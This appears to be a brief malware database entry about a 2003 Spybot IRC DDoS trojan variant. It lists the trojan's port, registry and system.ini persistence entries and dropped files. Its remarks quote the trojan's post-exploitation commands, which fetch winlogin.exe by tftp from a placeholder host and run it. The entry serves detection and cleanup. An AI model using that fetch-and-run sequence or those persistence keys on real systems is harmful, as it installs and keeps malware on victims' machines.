by ?
Released in August 2003
Server:
port: 113 TCP

startup:
  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce "winlogon"
  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "NDplDeamon"
  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "winlogon"
  c:\windows\system.ini, [boot] "shell"

added:
  c:\WINDOWS\SYSTEM\winlogin.exe
  c:\WINDOWS\SYSTEM\yuetyutr.dll (Backdoor.SdBot.au)
  c:\WINDOWS\TEMP\vhbmhbze.txt

remarks:
A variant of the Spybot IRC DDoS zombie. The trojan infects a system using the RPC/DCOM exploit shellcode. It runs the following commands:

  C:\WINNT\system32>tftp -i x.x.x.x GET winlogin.exe
  C:\WINNT\system32>start winlogin.exe
  C:\WINNT\system32>winlogin.exe

The dropped yuetyutr.dll is injected into the explorer.exe process by winlogin.exe.

MegaSecurity